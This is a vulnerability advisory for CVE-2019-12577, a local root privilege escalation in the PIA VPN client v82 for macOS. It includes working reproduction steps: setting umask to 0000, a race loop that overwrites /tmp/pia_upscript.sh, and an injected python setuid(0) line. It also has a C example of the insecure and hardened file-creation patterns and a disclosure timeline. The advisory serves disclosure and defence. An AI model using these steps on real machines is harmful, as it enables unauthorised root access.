security-research/vulnerabilities/PIA/CVE-2019-12577.txt
Title: PIA macOS Privilege Escalation: Insecure umask
Author: Rich Mirch
CVE: CVE-2019-12577
Vendor Advisory: N/A

Description

A vulnerability in the London Trust Media Private Internet Access (PIA) VPN
Client v82 for macOS could allow an authenticated, local attacker to run
arbitrary code with elevated privileges.

The PIA macOS binary openvpn_launcher.64 is setuid root. This binary creates
/tmp/pia_upscript.sh when executed. Because the file creation mask (umask) is not
reset, the umask value is inherited from the calling process. This value can be
manipulated to cause the privileged binary to create files with world writable
permissions. A local unprivileged user can modify /tmp/pia_upscript.sh during the
connect process to execute arbitrary code as the root user.

CVSS

Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F
Base: 7.8
Temporal: 7.6

Test Environment

OS: macOS Mojave 10.14.1
Kernel: Darwin Kernel Version 18.2.0
PIA Version: v82
Steps to reproduce

All steps are executed as a low privileged user.

Step 1 - Set umask to 0000.

    umask 0000

Step 2 - Verify the mask is 0000.

    umask

Step 3 - Execute openvpn_launcher.64. This will create /tmp/pia_upscript.sh
with permissions of 777.

    # macOS
    /Applications/Private\ Internet\ Access.app/Contents/Resources/openvpn_launcher 2>/dev/null

Step 4 - Verify /tmp/pia_upscript.sh is world writable.

    ls -ld /tmp/pia_upscript.sh

Step 5 - Create a copy of /tmp/pia_upscript.sh.

    cp /tmp/pia_upscript.sh /tmp/pia_upscript.sh.woot

Step 6 - Insert arbitrary code in /tmp/pia_upscript.sh.woot.

For this PoC we will execute the id command and pipe the output to wall. This
will display the uid/gid via a system broadcast message.

    # Add this line as line #2 of /tmp/pia_upscript.sh.woot.
    python -c 'import os;os.setuid(0);os.system("id|wall");'

Step 7 - Beat the race condition by continuously overwriting /tmp/pia_upscript.sh.
Put the job in the background. This is required because during the connection
process the script will be overwritten.

    cd /tmp
    while true; do cp pia_upscript.sh.woot pia_upscript.sh; done &

Step 8 - Execute run.sh to open the PIA GUI client.

    /Applications/Private\ Internet\ Access.app/Contents/MacOS/run.sh

Step 9 - Login and connect to the VPN.

During the connection process /tmp/pia_upscript.sh will be executed as root and you should
see a wall message showing the output of the id command with uid=0.
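The two defects behind this advisory, a privileged process trusting the umask it inherited (Description) and a helper script at a predictable, writable path that is executed without any ownership or permission check (steps 4 and 7), can be shown side by side in a few lines of C. The following is an added example written for this page; it is not PIA's code and does not touch the PIA script. The path /tmp/umask_demo.sh and the function names are constructed for the demonstration. The first function reproduces the weak pattern under a caller-chosen umask, the second resets the umask and creates the file with an owner-only mode and O_EXCL|O_NOFOLLOW, and the last two are the checks a defender (or the launcher itself) would run before trusting such a file.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Pattern the advisory describes: the privileged process creates its helper
 * script with a permissive requested mode and relies on whatever umask it
 * inherited to narrow it. caller_umask simulates the value set in the shell
 * that launched the setuid binary (0000 in the advisory). Returns the
 * permission bits the file actually received, or -1 on error. */
int create_with_inherited_umask(const char *path, mode_t caller_umask) {
    umask(caller_umask);               /* stands in for the inherited umask */
    unlink(path);
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0777);
    if (fd < 0) return -1;
    struct stat st;
    int rc = fstat(fd, &st);
    close(fd);
    return rc == 0 ? (int)(st.st_mode & 07777) : -1;
}

/* Hardened pattern: reset umask explicitly so the caller's value is
 * irrelevant, request an owner-only mode, and use O_EXCL|O_NOFOLLOW so that a
 * file or symlink already sitting at the path makes creation fail instead of
 * being silently reused. Returns the permission bits, or -1 on error. */
int create_with_reset_umask(const char *path) {
    umask(077);                        /* never trust the inherited value */
    unlink(path);                      /* clear our own previous copy */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0700);
    if (fd < 0) return -1;
    struct stat st;
    int rc = fstat(fd, &st);
    close(fd);
    return rc == 0 ? (int)(st.st_mode & 07777) : -1;
}

/* Defender-side check equivalent to "ls -ld" in step 4: 1 if the path is
 * world writable, 0 if not, -1 if it cannot be inspected. */
int is_world_writable(const char *path) {
    struct stat st;
    if (lstat(path, &st) != 0) return -1;
    return (st.st_mode & S_IWOTH) ? 1 : 0;
}

/* Check a privileged launcher should make before executing a helper script:
 * a regular file (not a symlink), owned by the expected uid, and writable by
 * nobody but the owner. 1 = safe, 0 = refuse, -1 = cannot inspect. */
int script_safe_to_run(const char *path, uid_t expected_owner) {
    struct stat st;
    if (lstat(path, &st) != 0) return -1;
    if (!S_ISREG(st.st_mode)) return 0;
    if (st.st_uid != expected_owner) return 0;
    if (st.st_mode & (S_IWGRP | S_IWOTH)) return 0;
    return 1;
}

int main(void) {
    /* Constructed demo path; it is not the PIA script from the advisory. */
    const char *p = "/tmp/umask_demo.sh";
    int m = create_with_inherited_umask(p, 0000);
    printf("inherited umask 0000: mode %04o, world writable=%d, safe=%d\n",
           m, is_world_writable(p), script_safe_to_run(p, geteuid()));
    m = create_with_reset_umask(p);
    printf("umask reset to 077:   mode %04o, world writable=%d, safe=%d\n",
           m, is_world_writable(p), script_safe_to_run(p, geteuid()));
    unlink(p);
    return 0;
}
```

Resetting the umask closes the hole the advisory reports, but the stronger fix is to keep the helper script out of /tmp altogether: a file in a root-owned directory with no world-writable parent removes both the permission problem and the overwrite race in step 7, and the script_safe_to_run check then serves as a last line of defence rather than the only one.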
Timeline:

2018-12-16: Reported to vendor
2018-12-16: Vendor acknowledged receipt of report
2019-01-18: Vendor states fix will be available in v83; however, this version was never released.
            The desktop client was re-written. Upgrade to v1.2.1+ of the new client.
2019-06-10: Public disclosure